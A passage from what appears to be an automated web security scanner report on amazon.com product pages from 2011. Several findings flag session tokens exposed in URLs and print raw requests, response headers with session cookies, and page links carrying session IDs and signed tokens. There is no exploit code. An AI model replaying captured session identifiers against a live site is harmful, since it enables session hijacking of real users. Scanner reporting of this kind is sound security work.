http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C006024D96E73A8B7B8B1241C3168FE1774D5B24&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834
http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7FDD05AB3E47C790F8D19B7B0B4AC8850D9AB7AC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=13BCECE2D82B947E0B79ABCDD4423AAE6290289D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834
http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=50E5D61092C9B40233DE2ABF4AB162EFE2F291DD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834

Request

GET /dp/B000EFAO1G HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:25 GMT
Server: Server
x-amz-id-1: 1M2XJ9DYN6Y7DG42N4TW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: ELcbf77740Mumzbh/Vico0QNtTydBr4E0na/ZodtnWmM3Vn8HD32Uh0849K57dxN
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=191-2655627-9808834; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 365604

<html>
<head>

<style type="text/css"><!--

BODY { fo
...[SNIP]...
<span id="mbc_B000EFAO1G_A1MVLP2KD6X0FZ_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=sporting-goods&nodeID=3375251&itemCount=1&offeringID.1=adHPCzl%252Fz0nRwfx10WS%252Bc7exJR2icuaHyjmC1DAu%252Bn6HOyULH%252BE16FXRAwsGCaY0qUwY4GNmKwyag1pYgINIqhOL0AjMyL26OcsDl9rZfW8wGXrzjDdkSFmoCs9y8e7x2QL5XGS8Dmxe0w8g4iNbqQ%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=191-2655627-9808834" ><span>
...[SNIP]...
<span id="mbc_B000EFAO1G_A92C6K2Y6F903_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=sporting-goods&nodeID=3375251&itemCount=1&offeringID.1=GTgJL3KUmyFqvnHULLAj%252FhWk173a%252BMiXJUK2MbmeXUgx2t9ECo62OedEENdvmIYKvNj44VhweK715aN2KtPFtWtL%252Fnn%252FoIctW9%252B8dwhuNDCXptyY3CsDr68NTifca%252FqczhfXOt9RXCw%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=191-2655627-9808834" ><span>
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_QHTpnb12JDNYD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_fa_dp_QHTpnb12JDNYD%26bodytext%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_QHTpnb12JDNYD?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_fa_dp_QHTpnb12JDNYD%26bodytext%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_QHTpnb12JDNYD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB000EFAO1G%252Fref%253Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_QHTpnb12JDNYD?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB000EFAO1G%252Fref%253Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSportline%2520Walking%2520Advantage%2520228%2520Giant%2520Stopwatch%2520by%2520Sportline%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB000EFAO1G%2Fref%3Dcm_sw_r_tw_dp_QHTpnb12JDNYD%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_sg_mainitem_atc?ie=UTF8&quantity.1=1&asin.1=B000EFAO1G&offeringID.1=4ySNZgakPd3BAo2i0BeY8RYqU%252BGOvdceafD49r5xM8uLA9aHFfkaggJZ%252BhhfC9OoOIGLAnX6QWhS1occmcjYko0IOXtSrFEuB5q2eh13y5Q%253D&action=addToCart&session-id=191-2655627-9808834" id="acc_cartadd_button_B000EFAO1G" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_1?ie=UTF8&quantity.1=1&asin.1=B000EMRT2Q&offeringID.1=7jcq51LAg6i14P%252F7j%252Bkijz2%252FhwpXMqgFsJtRpW6D5jiJizPY%252BzRcfvxN7286dP5kL38WX4nD%252FKQc9OGM6eOytmrssA1jD8nY8Eov4tfDtxs%253D&action=addToCart&session-id=191-2655627-9808834" id="acc_cartadd_button_B000EMRT2Q" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_2?ie=UTF8&quantity.1=1&asin.1=B000EG4614&offeringID.1=%252F0siBAHrjRmSUMbYbFkOPPJ%252FmQcBG%252FCzPlKHaKwvU8Bn3du1H1CMyLxZZ6IkGyXlsoMFMh8iZLo6HtNFS4c7uhk7yZsW87DzVNzsBMGR56U%253D&action=addToCart&session-id=191-2655627-9808834" id="acc_cartadd_button_B000EG4614" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_sg_ai_-2_atc_3?ie=UTF8&quantity.1=1&asin.1=B000C3U9II&offeringID.1=uz4LC9uODEANYmCS2BLmumflXP%252BA9jav0LyJFZWjtblFTk6t%252B57BiGsNK56pLSDZos8iX6canx7%252FdrDoCOHtpM8gOQvl5soAsDR64PzWvQg%253D&action=addToCart&session-id=191-2655627-9808834" id="acc_cartadd_button_B000C3U9II" ><span>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AEDB9FA1F3AC9E736846DE84F12A5A9C8BC44BCB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=EF76A88233722F79F2BE14EA125B3E4220402566&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2O296G4XJKBLA/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C91EB2221487561A30D06874DDE2B3D4919A3B3B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2O296G4XJKBLA.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=13BCECE2D82B947E0B79ABCDD4423AAE6290289D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7FDD05AB3E47C790F8D19B7B0B4AC8850D9AB7AC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RUHMGZCW49QQK/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=50E5D61092C9B40233DE2ABF4AB162EFE2F291DD&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RUHMGZCW49QQK.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=304FCF9B2857ABA16716F0B4D0717989AA818AAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=042DBD34F7B8D4936967EFF2468A191965D10C62&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Helpful.Reviews&voteSessionID=191-2655627-9808834"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2X5RVP0S0WBBF/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C006024D96E73A8B7B8B1241C3168FE1774D5B24&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMEVGQU8xRy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2X5RVP0S0WBBF.2115.Inappropriate.Reviews&voteSessionID=191-2655627-9808834"
>Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/191-2655627-9808834?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.73. http://www.amazon.com/dp/B001AIM6V2 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/B001AIM6V2

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_.HTpnb0BJD30K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_fa_dp_.HTpnb0BJD30K%26bodytext%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520December%25202007%252C%2520Vol.%252015%252C%2520No.%25208%252C%2520Sam%2520Elliott%2520by%2520Jason%2520Bell
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_.HTpnb0BJD30K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB001AIM6V2%252Fref%253Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=dtp_dp_lm_B001AIM6V2/183-5857754-1541453?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8

Request

GET /dp/B001AIM6V2 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:46 GMT
Server: Server
x-amz-id-1: 0QB6JFD5370MK0QCZ6QW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: aF0JiaUNwhyX+5d+IWlXePk8nKbtX+xMpBVLuDfuoQaOcPnQ3JMSv421E1jhCiDe
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-5857754-1541453; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 241990

<html>
<head>

<style type="text/css"><!--

BODY { font-
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_.HTpnb0BJD30K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_fa_dp_.HTpnb0BJD30K%26bodytext%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520December%25202007%252C%2520Vol.%252015%252C%2520No.%25208%252C%2520Sam%2520Elliott%2520by%2520Jason%2520Bell" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_.HTpnb0BJD30K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_fa_dp_.HTpnb0BJD30K%26bodytext%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520December%25202007%252C%2520Vol.%252015%252C%2520No.%25208%252C%2520Sam%2520Elliott%2520by%2520Jason%2520Bell', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_.HTpnb0BJD30K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB001AIM6V2%252Fref%253Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_.HTpnb0BJD30K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB001AIM6V2%252Fref%253Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<div class="content">
If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store.
<a href="/gp/redirect.html/ref=dtp_dp_lm_B001AIM6V2/183-5857754-1541453?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.74. http://www.amazon.com/dp/B0037UT1LY previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/B0037UT1LY

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_1?ie=UTF8&quantity.1=1&asin.1=B002MUANJO&offeringID.1=d8K1%252Fm6UOREHQlCtrYEptb8jMsSEVdnLgNV3MlH3pPN9aY1LCJ0g3D7lVs8EGz5G8dDCEOwUppestK9Pr7x5hz%252FzJGd4%252BJyFu1AcuhcUELk%253D&action=addToCart&session-id=176-7245636-0301444
http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_2?ie=UTF8&quantity.1=1&asin.1=B0015KXFB0&offeringID.1=dPZwUuWIn7aLqmxgg%252BjCgiuaxqNpRWrzo4Di%252FXWk3tpcNOVR2ic8UMwQfBCYMiIPv88Sr%252FpMpv2D8tebeZKc2OJ%252FiNITORk6WRd38ybBcCiNhR74Myv%252BuWo6AL46VKb%252FlwR2eCYUqJNSGx%252FAx83oiw%253D%253D&action=addToCart&session-id=176-7245636-0301444
http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_3?ie=UTF8&quantity.1=1&asin.1=B002MUANJE&offeringID.1=FHX6W4xZv2nO0UX3UqVMr%252FzNDLEXmT%252FB%252B1magCc6i%252BQxzKXdSBqJmIdiJawfdz0sGdc0vL51Z0JAd6MMtgzF8wG87YFsHv2nQKKIGvJq3KE%253D&action=addToCart&session-id=176-7245636-0301444
http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_4?ie=UTF8&quantity.1=1&asin.1=B002MUANJY&offeringID.1=7gAbqnGxEGlnxtTGcXMEA3MPQ5P079563XjAzzloVPxnANdjhrq%252BrTp9BPd3kQQNt2ob7DmCYaRZFqyTqskQ6s%252FcxkAuczJL5RokNGe0aGOoi%252BSpDE4ayZWDOZSeLpb5YoTxoPPqDXc%253D&action=addToCart&session-id=176-7245636-0301444
http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_5?ie=UTF8&quantity.1=1&asin.1=B002PUEFV8&offeringID.1=WDHKpkXI%252ByhvTuGDIU02ixhCur4MDNaUGuIZbeFTo%252FJT9DUppLEkCmnMMzip5lrLoiyB3xJ4eqss2%252BMm6hAKchAp0lnBJFUOe00t9DJumUyWAeROhD1MZfGXSkk4%252B3iAeWSbbnkLFEU%253D&action=addToCart&session-id=176-7245636-0301444
http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_6?ie=UTF8&quantity.1=1&asin.1=B002DPVAWW&offeringID.1=S7HZPe8%252B15O23zcf8ATavWOISw5yOv5Qx%252FHzP6dOxT00OMpphlpr3bFP62fUNa0YQl4VDvmbo0BDGdYG5%252Bn7tvUNZPCfsI0M%252BAlxkltb%252BMO7TFTdxXi2cmee6qstT89j%252BtV4KX%252FSvqKLBTOklxhrLA%253D%253D&action=addToCart&session-id=176-7245636-0301444
http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_mainitem_atc?ie=UTF8&quantity.1=1&asin.1=B0037UT1LY&offeringID.1=rkwIMZZaSgvr4svmE08Xdp0Zvs0a6lOb3V%252FgiWkSghsPwExTjR%252FusHmmDDFEFaC%252FG9moGAZPyQkP7YM6S5A34u24NpGrxIsQfG2UvF2qOVZD7PwKNntZJQfQ25cJ8Mq12YcFHlmlhJ82jiRVySaaGg%253D%253D&action=addToCart&session-id=176-7245636-0301444
http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=2MQwY8ILcK2Djroj0nDPMkclnVrTsEUHfT%252BACxyBzT9IwaPKymXMiWHbirwLUl%252BLlB6KnjYE0DHaX4sKC%252FSm0roI88JUO8tTZg40NNL0lWq1WADKosS7yl6gCfNOLU%252BOELWNK%252FM4DbK9o1SxfRRxtw%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444
